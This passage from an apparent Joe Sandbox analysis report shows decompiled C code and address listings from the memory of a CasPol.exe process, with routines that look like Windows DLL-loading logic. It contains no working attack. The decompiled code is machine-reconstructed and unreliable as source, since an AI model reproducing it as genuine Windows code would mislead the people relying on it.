                                                                								}
                                                                								_t384 = _t287 -  *0x1717b90; // 0x77880000
                                                                								if(_t384 == 0) {
                                                                									_t353 =  *0x1717b8c; // 0x11c2a78
                                                                									_v176 = _t353;
                                                                									_t320 = ( *(_t353 + 0x50))[8];
                                                                									_v184 = _t320;
                                                                								} else {
                                                                									E01642280(_t200, 0x17184d8);
                                                                									_t277 =  *0x17185f4; // 0x11c2f68
                                                                									_t351 =  *0x17185f8 & 1;
                                                                									while(_t277 != 0) {
                                                                										_t337 =  *(_t277 - 0x50);
                                                                										if(_t337 > _t287) {
                                                                											_t338 = _t337 | 0xffffffff;
                                                                										} else {
                                                                											asm("sbb ecx, ecx");
                                                                											_t338 =  ~_t337;
                                                                										}
                                                                										_t387 = _t338;
                                                                										if(_t387 < 0) {
                                                                											_t339 =  *_t277;
                                                                											__eflags = _t351;
                                                                											if(_t351 != 0) {
                                                                												__eflags = _t339;
                                                                												if(_t339 == 0) {
                                                                													goto L16;
                                                                												} else {
                                                                													goto L118;
                                                                												}
                                                                												goto L151;
                                                                											} else {
                                                                												goto L16;
                                                                											}
                                                                											goto L17;
                                                                										} else {
                                                                											if(_t387 <= 0) {
                                                                												__eflags = _t277;
                                                                												if(_t277 != 0) {
                                                                													_t340 =  *(_t277 - 0x18);
                                                                													_t24 = _t277 - 0x68; // 0x11c2f00
                                                                													_t353 = _t24;
                                                                													_v176 = _t353;
                                                                													__eflags = _t340[3] - 0xffffffff;
                                                                													if(_t340[3] != 0xffffffff) {
                                                                														_t279 =  *_t340;
                                                                														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                                                														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                                                															asm("lock inc dword [edi+0x9c]");
                                                                															_t340 =  *(_t353 + 0x50);
                                                                														}
                                                                													}
                                                                													_v184 = _t340[8];
                                                                												}
                                                                											} else {
                                                                												_t339 =  *(_t277 + 4);
                                                                												if(_t351 != 0) {
                                                                													__eflags = _t339;
                                                                													if(_t339 == 0) {
                                                                														goto L16;
                                                                													} else {
                                                                														L118:
                                                                														_t277 = _t277 ^ _t339;
                                                                														goto L17;
                                                                													}
                                                                													goto L151;
                                                                												} else {
                                                                													L16:
                                                                													_t277 = _t339;
                                                                												}
                                                                												goto L17;
                                                                											}
                                                                										}
                                                                										goto L25;
                                                                										L17:
                                                                									}
                                                                									L25:
                                                                									E0163FFB0(_t287, _t353, 0x17184d8);
                                                                									_t320 = _v184;
                                                                									_t342 = 0x1000;
                                                                								}
                                                                								if(_t353 == 0) {
                                                                									break;
                                                                								} else {
                                                                									_t366 = 0;
                                                                									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                                                										_t288 = _v164;
                                                                										if(_t353 != 0) {
                                                                											_t342 = _t288;
                                                                											_t374 = E0167CC99(_t353, _t288, _v200, 1,  &_v168);
                                                                											if(_t374 >= 0) {
                                                                												if(_v184 == 7) {
                                                                													__eflags = _a20;
                                                                													if(__eflags == 0) {
                                                                														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                                                														if(__eflags != 0) {
                                                                															_t271 = E01636600(0x17152d8);
                                                                															__eflags = _t271;
                                                                															if(__eflags == 0) {
                                                                																_t342 = 0;
                                                                																_v169 = _t271;
                                                                																_t374 = E01637926( *(_t353 + 0x50), 0,  &_v169);
                                                                															}
                                                                														}
                                                                													}
                                                                												}
                                                                												if(_t374 < 0) {
                                                                													_v168 = 0;
                                                                												} else {
                                                                													if( *0x171b239 != 0) {
                                                                														_t342 =  *(_t353 + 0x18);
                                                                														E016AE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                                                													}
                                                                													if( *0x1718472 != 0) {
                                                                														_v192 = 0;
                                                                														_t342 =  *0x7ffe0330;
                                                                														asm("ror edi, cl");
                                                                														 *0x171b1e0( &_v192, _t353, _v168, 0, _v180);
                                                                														 *( *0x171b218 ^  *0x7ffe0330)();
                                                                														_t269 = _v192;
                                                                														_t353 = _v176;
                                                                														__eflags = _t269;
                                                                														if(__eflags != 0) {
                                                                															_v168 = _t269;
                                                                														}
                                                                													}
                                                                												}
                                                                											}
                                                                											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                                                												_t366 = 0xc000007a;
                                                                											}
                                                                											_t247 =  *(_t353 + 0x50);
                                                                											if(_t247[3] == 0xffffffff) {
                                                                												L40:
                                                                												if(_t366 == 0xc000007a) {
                                                                													__eflags = _t288;
                                                                													if(_t288 == 0) {
                                                                														goto L136;
                                                                													} else {
                                                                														_t366 = 0xc0000139;
                                                                													}
                                                                													goto L54;
                                                                												}
                                                                											} else {
                                                                												_t249 =  *_t247;
                                                                												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                                                													goto L40;
                                                                												} else {
                                                                													_t250 = _t249 | 0xffffffff;
                                                                													asm("lock xadd [edi+0x9c], eax");
                                                                													if((_t249 | 0xffffffff) == 0) {
                                                                														E01642280(_t250, 0x17184d8);
                                                                														_t342 =  *(_t353 + 0x54);
                                                                														_t165 = _t353 + 0x54; // 0x54
                                                                														_t252 = _t165;
                                                                														__eflags =  *(_t342 + 4) - _t252;
                                                                														if( *(_t342 + 4) != _t252) {
                                                                															L135:
                                                                															asm("int 0x29");
                                                                															L136:
                                                                															_t288 = _v200;
                                                                															_t366 = 0xc0000138;
                                                                															L54:
                                                                															_t342 = _t288;
                                                                															L01663898(0, _t288, _t366);
                                                                														} else {
                                                                															_t324 =  *(_t252 + 4);
                                                                															__eflags =  *_t324 - _t252;
                                                                															if( *_t324 != _t252) {
                                                                																goto L135;
                                                                															} else {
                                                                																 *_t324 = _t342;
                                                                																 *(_t342 + 4) = _t324;
                                                                																_t293 =  *(_t353 + 0x50);
                                                                																_v180 =  *_t293;
                                                                																E0163FFB0(_t293, _t353, 0x17184d8);
                                                                																__eflags =  *((short*)(_t353 + 0x3a));
                                                                																if( *((short*)(_t353 + 0x3a)) != 0) {
                                                                																	_t342 = 0;
                                                                																	__eflags = 0;
                                                                																	E016637F5(_t353, 0);
                                                                																}
                                                                																E01660413(_t353);
                                                                																_t256 =  *(_t353 + 0x48);
                                                                																__eflags = _t256;
                                                                																if(_t256 != 0) {
                                                                																	__eflags = _t256 - 0xffffffff;
                                                                																	if(_t256 != 0xffffffff) {
                                                                																		E01659B10(_t256);
                                                                																	}
                                                                																}
                                                                																__eflags =  *(_t353 + 0x28);
                                                                																if( *(_t353 + 0x28) != 0) {
                                                                																	_t174 = _t353 + 0x24; // 0x24
                                                                																	E016502D6(_t174);
                                                                																}
                                                                																L016477F0( *0x1717b98, 0, _t353);
                                                                																__eflags = _v180 - _t293;
                                                                																if(__eflags == 0) {
                                                                																	E0165C277(_t293, _t366);
                                                                																}
                                                                																_t288 = _v164;
                                                                																goto L40;
                                                                															}
                                                                														}
                                                                													} else {
                                                                														goto L40;
                                                                													}
                                                                												}
                                                                											}
                                                                										}
                                                                									} else {
                                                                										L0163EC7F(_t353);
                                                                										L016519B8(_t287, 0, _t353, 0);
                                                                										_t200 = E0162F4E3(__eflags);
                                                                										continue;
                                                                									}
                                                                								}
                                                                								L41:
                                                                								if(_v157 != 0) {
                                                                									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                                                								}
                                                                								if(_t366 < 0 || ( *0x171b2f8 |  *0x171b2fc) == 0 || ( *0x171b2e4 & 0x00000001) != 0) {
                                                                									L46:
                                                                									 *_v212 = _v168;
                                                                									_t204 = _t366;
                                                                									L47:
                                                                									_pop(_t354);
                                                                									_pop(_t367);
                                                                									_pop(_t289);
                                                                									return E0166B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                                                								} else {
                                                                									_v200 = 0;
                                                                									if(( *0x171b2ec >> 0x00000008 & 0x00000003) == 3) {
                                                                										_t355 = _v168;
                                                                										_t342 =  &_v208;
                                                                										_t208 = E016D6B68(_v168,  &_v208, _v168, __eflags);
                                                                										__eflags = _t208 - 1;
                                                                										if(_t208 == 1) {
                                                                											goto L46;
                                                                										} else {
                                                                											__eflags = _v208 & 0x00000010;
                                                                											if((_v208 & 0x00000010) == 0) {
                                                                												goto L46;
                                                                											} else {
                                                                												_t342 = 4;
                                                                												_t366 = E016D6AEB(_t355, 4,  &_v216);
                                                                												__eflags = _t366;
                                                                												if(_t366 >= 0) {
                                                                													goto L46;
                                                                												} else {
                                                                													asm("int 0x29");
                                                                													_t356 = 0;
                                                                													_v44 = 0;
                                                                													_t290 = _v52;
                                                                													__eflags = 0;
                                                                													if(0 == 0) {
                                                                														L108:
                                                                														_t356 = 0;
                                                                														_v44 = 0;
                                                                														goto L63;
                                                                													} else {
                                                                														__eflags = 0;
                                                                														if(0 < 0) {
                                                                															goto L108;
                                                                														}
                                                                														L63:
                                                                														_v112 = _t356;
                                                                														__eflags = _t356;
                                                                														if(_t356 == 0) {
                                                                															L143:
                                                                															_v8 = 0xfffffffe;
                                                                															_t211 = 0xc0000089;
                                                                														} else {
                                                                															_v36 = 0;
                                                                															_v60 = 0;
                                                                															_v48 = 0;
                                                                															_v68 = 0;
                                                                															_v44 = _t290 & 0xfffffffc;
                                                                															E0163E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                                                															_t306 = _v68;
                                                                															__eflags = _t306;
                                                                															if(_t306 == 0) {
                                                                																_t216 = 0xc000007b;
                                                                																_v36 = 0xc000007b;
                                                                																_t307 = _v60;
                                                                															} else {
                                                                																__eflags = _t290 & 0x00000001;
                                                                																if(__eflags == 0) {
                                                                																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                                                																	__eflags = _t349 - 0x10b;
                                                                																	if(_t349 != 0x10b) {
                                                                																		__eflags = _t349 - 0x20b;
                                                                																		if(_t349 == 0x20b) {
                                                                																			goto L102;
                                                                																		} else {
                                                                																			_t307 = 0;
                                                                																			_v48 = 0;
                                                                																			_t216 = 0xc000007b;
                                                                																			_v36 = 0xc000007b;
                                                                																			goto L71;
                                                                																		}
                                                                																	} else {
                                                                																		L102:
                                                                																		_t307 =  *(_t306 + 0x50);
                                                                																		goto L69;
                                                                																	}
                                                                																	goto L151;
                                                                																} else {
                                                                																	_t239 = L0163EAEA(_t290, _t290, _t356, _t366, __eflags);
                                                                																	_t307 = _t239;
                                                                																	_v60 = _t307;
                                                                																	_v48 = _t307;
                                                                																	__eflags = _t307;
                                                                																	if(_t307 != 0) {
                                                                																		L70:
                                                                																		_t216 = _v36;
                                                                																	} else {
                                                                																		_push(_t239);
                                                                																		_push(0x14);
                                                                																		_push( &_v144);
                                                                																		_push(3);
                                                                																		_push(_v44);
                                                                																		_push(0xffffffff);
                                                                																		_t319 = E01669730();
                                                                																		_v36 = _t319;
                                                                																		__eflags = _t319;
                                                                																		if(_t319 < 0) {
                                                                																			_t216 = 0xc000001f;
                                                                																			_v36 = 0xc000001f;
                                                                																			_t307 = _v60;
                                                                																		} else {
                                                                																			_t307 = _v132;
                                                                																			L69:
                                                                																			_v48 = _t307;
                                                                																			goto L70;
                                                                																		}
                                                                																	}
                                                                																}
                                                                															}
                                                                															L71:
                                                                															_v72 = _t307;
                                                                															_v84 = _t216;
                                                                															__eflags = _t216 - 0xc000007b;
                                                                															if(_t216 == 0xc000007b) {
                                                                																L150:
                                                                																_v8 = 0xfffffffe;
                                                                																_t211 = 0xc000007b;
                                                                															} else {
                                                                																_t344 = _t290 & 0xfffffffc;
                                                                																_v76 = _t344;
                                                                																__eflags = _v40 - _t344;
                                                                																if(_v40 <= _t344) {
                                                                																	goto L150;
                                                                																} else {
                                                                																	__eflags = _t307;
                                                                																	if(_t307 == 0) {
                                                                																		L75:
                                                                																		_t217 = 0;
                                                                																		_v104 = 0;
                                                                																		__eflags = _t366;
                                                                																		if(_t366 != 0) {
                                                                																			__eflags = _t290 & 0x00000001;
                                                                																			if((_t290 & 0x00000001) != 0) {
                                                                																				_t217 = 1;
                                                                																				_v104 = 1;
                                                                																			}
                                                                																			_t290 = _v44;
                                                                																			_v52 = _t290;
                                                                																		}
                                                                																		__eflags = _t217 - 1;
                                                                																		if(_t217 != 1) {
                                                                																			_t369 = 0;
                                                                																			_t218 = _v40;
                                                                																			goto L91;
                                                                																		} else {
                                                                																			_v64 = 0;
                                                                																			E0163E9C0(1, _t290, 0, 0,  &_v64);
                                                                																			_t309 = _v64;
                                                                																			_v108 = _t309;
                                                                																			__eflags = _t309;
                                                                																			if(_t309 == 0) {
                                                                																				goto L143;
                                                                																			} else {
                                                                																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                                                																				__eflags = _t226 - 0x10b;
                                                                																				if(_t226 != 0x10b) {
                                                                																					__eflags = _t226 - 0x20b;
                                                                																					if(_t226 != 0x20b) {
                                                                																						goto L143;
                                                                																					} else {
                                                                																						_t371 =  *(_t309 + 0x98);
                                                                																						goto L83;
                                                                																					}
                                                                																				} else {
                                                                																					_t371 =  *(_t309 + 0x88);
                                                                																					L83:
                                                                																					__eflags = _t371;
                                                                																					if(_t371 != 0) {
                                                                																						_v80 = _t371 - _t356 + _t290;
                                                                																						_t310 = _v64;
                                                                																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                                                																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                                                                																						_t311 = 0;
                                                                																						__eflags = 0;
                                                                																						while(1) {
                                                                																							_v120 = _t311;
                                                                																							_v116 = _t348;
                                                                																							__eflags = _t311 - _t292;
                                                                																							if(_t311 >= _t292) {
                                                                																								goto L143;
                                                                																							}
                                                                																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                                                																							__eflags = _t371 - _t359;
                                                                																							if(_t371 < _t359) {
                                                                																								L98:
                                                                																								_t348 = _t348 + 0x28;
                                                                																								_t311 = _t311 + 1;
                                                                																								continue;
                                                                																							} else {
                                                                																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                                                																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                                                																									goto L98;
                                                                																								} else {
                                                                																									__eflags = _t348;
                                                                																									if(_t348 == 0) {
                                                                																										goto L143;
                                                                																									} else {
                                                                																										_t218 = _v40;
                                                                																										_t312 =  *_t218;
                                                                																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                                                																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                                                																											_v100 = _t359;
                                                                																											_t360 = _v108;
                                                                																											_t372 = L01638F44(_v108, _t312);
                                                                																											__eflags = _t372;
                                                                																											if(_t372 == 0) {
                                                                																												goto L143;
                                                                																											} else {
                                                                																												_t290 = _v52;
                                                                																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01663C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                                                																												_t307 = _v72;
                                                                																												_t344 = _v76;
                                                                																												_t218 = _v40;
                                                                																												goto L91;
                                                                																											}
                                                                																										} else {
                                                                																											_t290 = _v52;
                                                                																											_t307 = _v72;
                                                                																											_t344 = _v76;
                                                                																											_t369 = _v80;
                                                                																											L91:
                                                                																											_t358 = _a4;
                                                                																											__eflags = _t358;
                                                                																											if(_t358 == 0) {
                                                                																												L95:
                                                                																												_t308 = _a8;
                                                                																												__eflags = _t308;
                                                                																												if(_t308 != 0) {
                                                                																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                                                																												}
                                                                																												_v8 = 0xfffffffe;
                                                                																												_t211 = _v84;
                                                                																											} else {
                                                                																												_t370 =  *_t218 - _t369 + _t290;
                                                                																												 *_t358 = _t370;
                                                                																												__eflags = _t370 - _t344;
                                                                																												if(_t370 <= _t344) {
                                                                																													L149:
                                                                																													 *_t358 = 0;
                                                                																													goto L150;
                                                                																												} else {
                                                                																													__eflags = _t307;
                                                                																													if(_t307 == 0) {
                                                                																														goto L95;
                                                                																													} else {
                                                                																														__eflags = _t370 - _t344 + _t307;
                                                                																														if(_t370 >= _t344 + _t307) {
                                                                																															goto L149;
                                                                																														} else {
                                                                																															goto L95;
                                                                																														}
                                                                																													}
                                                                																												}
                                                                																											}
                                                                																										}
                                                                																									}
                                                                																								}
                                                                																							}
                                                                																							goto L97;
                                                                																						}
                                                                																					}
                                                                																					goto L143;
                                                                																				}
                                                                																			}
                                                                																		}
                                                                																	} else {
                                                                																		__eflags = _v40 - _t307 + _t344;
                                                                																		if(_v40 >= _t307 + _t344) {
                                                                																			goto L150;
                                                                																		} else {
                                                                																			goto L75;
                                                                																		}
                                                                																	}
                                                                																}
                                                                															}
                                                                														}
                                                                														L97:
                                                                														 *[fs:0x0] = _v20;
                                                                														return _t211;
                                                                													}
                                                                												}
                                                                											}
                                                                										}
                                                                									} else {
                                                                										goto L46;
                                                                									}
                                                                								}
                                                                								goto L151;
                                                                							}
                                                                							_t288 = _v164;
                                                                							_t366 = 0xc0000135;
                                                                							goto L41;
                                                                						}
                                                                					}
                                                                				}
                                                                				L151:
                                                                			}
                                                                0x0163d6f5
                                                                0x0163d6f9
                                                                0x0163d6fb
                                                                0x0163d6fd
                                                                0x0163d701
                                                                0x0163d703
                                                                0x0163d70a
                                                                0x0163d70a
                                                                0x0163d701
                                                                0x0163d710
                                                                0x0163d710
                                                                0x0163d6c1
                                                                0x0163d6c1
                                                                0x0163d6c6
                                                                0x0168b36d
                                                                0x0168b36f
                                                                0x00000000
                                                                0x0168b375
                                                                0x0168b375
                                                                0x0168b375
                                                                0x00000000
                                                                0x0168b375
                                                                0x00000000
                                                                0x0163d6cc
                                                                0x0163d6d8
                                                                0x0163d6d8
                                                                0x0163d6d8
                                                                0x00000000
                                                                0x0163d6c6
                                                                0x0163d6bf
                                                                0x00000000
                                                                0x0163d6da
                                                                0x0163d6da
                                                                0x0163d716
                                                                0x0163d71b
                                                                0x0163d720
                                                                0x0163d726
                                                                0x0163d726
                                                                0x0163d72d
                                                                0x00000000
                                                                0x0163d733
                                                                0x0163d739
                                                                0x0163d742
                                                                0x0163d750
                                                                0x0163d758
                                                                0x0163d764
                                                                0x0163d776
                                                                0x0163d77a
                                                                0x0163d783
                                                                0x0163d928
                                                                0x0163d92c
                                                                0x0163d93d
                                                                0x0163d944
                                                                0x0163d94f
                                                                0x0163d954
                                                                0x0163d956
                                                                0x0163d95f
                                                                0x0163d961
                                                                0x0163d973
                                                                0x0163d973
                                                                0x0163d956
                                                                0x0163d944
                                                                0x0163d92c
                                                                0x0163d78b
                                                                0x0168b394
                                                                0x0163d791
                                                                0x0163d798
                                                                0x0168b3a3
                                                                0x0168b3bb
                                                                0x0168b3bb
                                                                0x0163d7a5
                                                                0x0163d866
                                                                0x0163d870
                                                                0x0163d892
                                                                0x0163d898
                                                                0x0163d89e
                                                                0x0163d8a0
                                                                0x0163d8a6
                                                                0x0163d8ac
                                                                0x0163d8ae
                                                                0x0163d8b4
                                                                0x0163d8b4
                                                                0x0163d8ae
                                                                0x0163d7a5
                                                                0x0163d78b
                                                                0x0163d7b1
                                                                0x0168b3c5
                                                                0x0168b3c5
                                                                0x0163d7c3
                                                                0x0163d7ca
                                                                0x0163d7e5
                                                                0x0163d7eb
                                                                0x0163d8eb
                                                                0x0163d8ed
                                                                0x00000000
                                                                0x0163d8f3
                                                                0x0163d8f3
                                                                0x0163d8f3
                                                                0x00000000
                                                                0x0163d8ed
                                                                0x0163d7cc
                                                                0x0163d7cc
                                                                0x0163d7d2
                                                                0x00000000
                                                                0x0163d7d4
                                                                0x0163d7d4
                                                                0x0163d7d7
                                                                0x0163d7df
                                                                0x0168b3d4
                                                                0x0168b3d9
                                                                0x0168b3dc
                                                                0x0168b3dc
                                                                0x0168b3df
                                                                0x0168b3e2
                                                                0x0168b468
                                                                0x0168b46d
                                                                0x0168b46f
                                                                0x0168b46f
                                                                0x0168b475
                                                                0x0163d8f8
                                                                0x0163d8f9
                                                                0x0163d8fd
                                                                0x0168b3e8
                                                                0x0168b3e8
                                                                0x0168b3eb
                                                                0x0168b3ed
                                                                0x00000000
                                                                0x0168b3ef
                                                                0x0168b3ef
                                                                0x0168b3f1
                                                                0x0168b3f4
                                                                0x0168b3fe
                                                                0x0168b404
                                                                0x0168b409
                                                                0x0168b40e
                                                                0x0168b410
                                                                0x0168b410
                                                                0x0168b414
                                                                0x0168b414
                                                                0x0168b41b
                                                                0x0168b420
                                                                0x0168b423
                                                                0x0168b425
                                                                0x0168b427
                                                                0x0168b42a
                                                                0x0168b42d
                                                                0x0168b42d
                                                                0x0168b42a
                                                                0x0168b432
                                                                0x0168b436
                                                                0x0168b438
                                                                0x0168b43b
                                                                0x0168b43b
                                                                0x0168b449
                                                                0x0168b44e
                                                                0x0168b454
                                                                0x0168b458
                                                                0x0168b458
                                                                0x0168b45d
                                                                0x00000000
                                                                0x0168b45d
                                                                0x0168b3ed
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0163d7df
                                                                0x0163d7d2
                                                                0x0163d7ca
                                                                0x0168b37c
                                                                0x0168b37e
                                                                0x0168b385
                                                                0x0168b38a
                                                                0x00000000
                                                                0x0168b38a
                                                                0x0163d742
                                                                0x0163d7f1
                                                                0x0163d7f8
                                                                0x0168b49b
                                                                0x0168b49b
                                                                0x0163d800
                                                                0x0163d837
                                                                0x0163d843
                                                                0x0163d845
                                                                0x0163d847
                                                                0x0163d84a
                                                                0x0163d84b
                                                                0x0163d84e
                                                                0x0163d857
                                                                0x0163d818
                                                                0x0163d824
                                                                0x0163d831
                                                                0x0168b4a5
                                                                0x0168b4ab
                                                                0x0168b4b3
                                                                0x0168b4b8
                                                                0x0168b4bb
                                                                0x00000000
                                                                0x0168b4c1
                                                                0x0168b4c1
                                                                0x0168b4c8
                                                                0x00000000
                                                                0x0168b4ce
                                                                0x0168b4d4
                                                                0x0168b4e1
                                                                0x0168b4e3
                                                                0x0168b4e5
                                                                0x00000000
                                                                0x0168b4eb
                                                                0x0168b4f0
                                                                0x0168b4f2
                                                                0x0163dac9
                                                                0x0163dacc
                                                                0x0163dacf
                                                                0x0163dad1
                                                                0x0163dd78
                                                                0x0163dd78
                                                                0x0163dcf2
                                                                0x00000000
                                                                0x0163dad7
                                                                0x0163dad9
                                                                0x0163dadb
                                                                0x00000000
                                                                0x00000000
                                                                0x0163dae1
                                                                0x0163dae1
                                                                0x0163dae4
                                                                0x0163dae6
                                                                0x0168b4f9
                                                                0x0168b4f9
                                                                0x0168b500
                                                                0x0163daec
                                                                0x0163daec
                                                                0x0163daf5
                                                                0x0163daf8
                                                                0x0163dafb
                                                                0x0163db03
                                                                0x0163db11
                                                                0x0163db16
                                                                0x0163db19
                                                                0x0163db1b
                                                                0x0168b52c
                                                                0x0168b531
                                                                0x0168b534
                                                                0x0163db21
                                                                0x0163db21
                                                                0x0163db24
                                                                0x0163dcd9
                                                                0x0163dce2
                                                                0x0163dce5
                                                                0x0163dd6a
                                                                0x0163dd6d
                                                                0x00000000
                                                                0x0163dd73
                                                                0x0168b51a
                                                                0x0168b51c
                                                                0x0168b51f
                                                                0x0168b524
                                                                0x00000000
                                                                0x0168b524
                                                                0x0163dce7
                                                                0x0163dce7
                                                                0x0163dce7
                                                                0x00000000
                                                                0x0163dce7
                                                                0x00000000
                                                                0x0163db2a
                                                                0x0163db2c
                                                                0x0163db31
                                                                0x0163db33
                                                                0x0163db36
                                                                0x0163db39
                                                                0x0163db3b
                                                                0x0163db66
                                                                0x0163db66
                                                                0x0163db3d
                                                                0x0163db3d
                                                                0x0163db3e
                                                                0x0163db46
                                                                0x0163db47
                                                                0x0163db49
                                                                0x0163db4c
                                                                0x0163db53
                                                                0x0163db55
                                                                0x0163db58
                                                                0x0163db5a
                                                                0x0168b50a
                                                                0x0168b50f
                                                                0x0168b512
                                                                0x0163db60
                                                                0x0163db60
                                                                0x0163db63
                                                                0x0163db63
                                                                0x00000000
                                                                0x0163db63
                                                                0x0163db5a
                                                                0x0163db3b
                                                                0x0163db24
                                                                0x0163db69
                                                                0x0163db69
                                                                0x0163db6c
                                                                0x0163db6f
                                                                0x0163db74
                                                                0x0168b557
                                                                0x0168b557
                                                                0x0168b55e
                                                                0x0163db7a
                                                                0x0163db7c
                                                                0x0163db7f
                                                                0x0163db82
                                                                0x0163db85
                                                                0x00000000
                                                                0x0163db8b
                                                                0x0163db8b
                                                                0x0163db8d
                                                                0x0163db9b
                                                                0x0163db9b
                                                                0x0163db9d
                                                                0x0163dba0
                                                                0x0163dba2
                                                                0x0163dba4
                                                                0x0163dba7
                                                                0x0163dba9
                                                                0x0163dbae
                                                                0x0163dbae
                                                                0x0163dbb1
                                                                0x0163dbb4
                                                                0x0163dbb4
                                                                0x0163dbb7
                                                                0x0163dbba
                                                                0x0163dcd2
                                                                0x0163dcd4
                                                                0x00000000
                                                                0x0163dbc0
                                                                0x0163dbc0
                                                                0x0163dbd2
                                                                0x0163dbd7
                                                                0x0163dbda
                                                                0x0163dbdd
                                                                0x0163dbdf
                                                                0x00000000
                                                                0x0163dbe5
                                                                0x0163dbe5
                                                                0x0163dbee
                                                                0x0163dbf1
                                                                0x0168b541
                                                                0x0168b544
                                                                0x00000000
                                                                0x0168b546
                                                                0x0168b546
                                                                0x00000000
                                                                0x0168b546
                                                                0x0163dbf7
                                                                0x0163dbf7
                                                                0x0163dbfd
                                                                0x0163dbfd
                                                                0x0163dbff
                                                                0x0163dc0b
                                                                0x0163dc15
                                                                0x0163dc1b
                                                                0x0163dc1d
                                                                0x0163dc21
                                                                0x0163dc21
                                                                0x0163dc23
                                                                0x0163dc23
                                                                0x0163dc26
                                                                0x0163dc29
                                                                0x0163dc2b
                                                                0x00000000
                                                                0x00000000
                                                                0x0163dc31
                                                                0x0163dc34
                                                                0x0163dc36
                                                                0x0163dcbf

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a9e4bc780eb4c73ff03b1cd94135fd9ca92ecb00e6460c6b3b9ed7fff2361d41
                                                                • Instruction ID: 63b70bddec4a4154a76a6f74f017297fbc52b43f5c977f6fb544f91ef3b508b0
                                                                • Opcode Fuzzy Hash: a9e4bc780eb4c73ff03b1cd94135fd9ca92ecb00e6460c6b3b9ed7fff2361d41
                                                                • Instruction Fuzzy Hash: D0E1CE70A0125A8FEB35DF6CCC90BB9BBB2BF86314F4542ADD90997391D730A981CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 92%
                                                                			E0163849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                                                				void* _t136;
                                                                				signed int _t139;
                                                                				signed int _t141;
                                                                				signed int _t145;
                                                                				intOrPtr _t146;
                                                                				signed int _t149;
                                                                				signed int _t150;
                                                                				signed int _t161;
                                                                				signed int _t163;
                                                                				signed int _t165;
                                                                				signed int _t169;
                                                                				signed int _t171;
                                                                				signed int _t194;
                                                                				signed int _t200;
                                                                				void* _t201;
                                                                				signed int _t204;
                                                                				signed int _t206;
                                                                				signed int _t210;
                                                                				signed int _t214;
                                                                				signed int _t215;
                                                                				signed int _t218;
                                                                				void* _t221;
                                                                				signed int _t224;
                                                                				signed int _t226;
                                                                				intOrPtr _t228;
                                                                				signed int _t232;
                                                                				signed int _t233;
                                                                				signed int _t234;
                                                                				void* _t237;
                                                                				void* _t238;
                                                                
                                                                				_t236 = __esi;
                                                                				_t235 = __edi;
                                                                				_t193 = __ebx;
                                                                				_push(0x70);
                                                                				_push(0x16ff9c0);
                                                                				E0167D0E8(__ebx, __edi, __esi);
                                                                				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                                                				if( *0x1717b04 == 0) {
                                                                					L4:
                                                                					goto L5;
                                                                				} else {
                                                                					_t136 = E0163CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                                                					_t236 = 0;
                                                                					if(_t136 < 0) {
                                                                						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                                                					}
                                                                					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                                                						_t193 =  *( *[fs:0x30] + 0x18);
                                                                						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                                                						 *(_t237 - 0x68) = _t236;
                                                                						 *(_t237 - 0x6c) = _t236;
                                                                						_t235 = _t236;
                                                                						 *(_t237 - 0x60) = _t236;
                                                                						E01642280( *[fs:0x30], 0x1718550);
                                                                						_t139 =  *0x1717b04; // 0x1
                                                                						__eflags = _t139 - 1;
                                                                						if(__eflags != 0) {
                                                                							_t200 = 0xc;
                                                                							_t201 = _t237 - 0x40;
                                                                							_t141 = E0165F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                                                							 *(_t237 - 0x44) = _t141;
                                                                							__eflags = _t141;
                                                                							if(_t141 < 0) {
                                                                								L50:
                                                                								E0163FFB0(_t193, _t235, 0x1718550);
                                                                								L5:
                                                                								return E0167D130(_t193, _t235, _t236);
                                                                							}
                                                                							_push(_t201);
                                                                							_t221 = 0x10;
                                                                							_t202 =  *(_t237 - 0x40);
                                                                							_t145 = E01621C45( *(_t237 - 0x40), _t221);
                                                                							 *(_t237 - 0x44) = _t145;
                                                                							__eflags = _t145;
                                                                							if(_t145 < 0) {
                                                                								goto L50;
                                                                							}
                                                                							_t146 =  *0x1717b9c; // 0x0
                                                                							_t235 = L01644620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                                                							 *(_t237 - 0x60) = _t235;
                                                                							__eflags = _t235;
                                                                							if(_t235 == 0) {
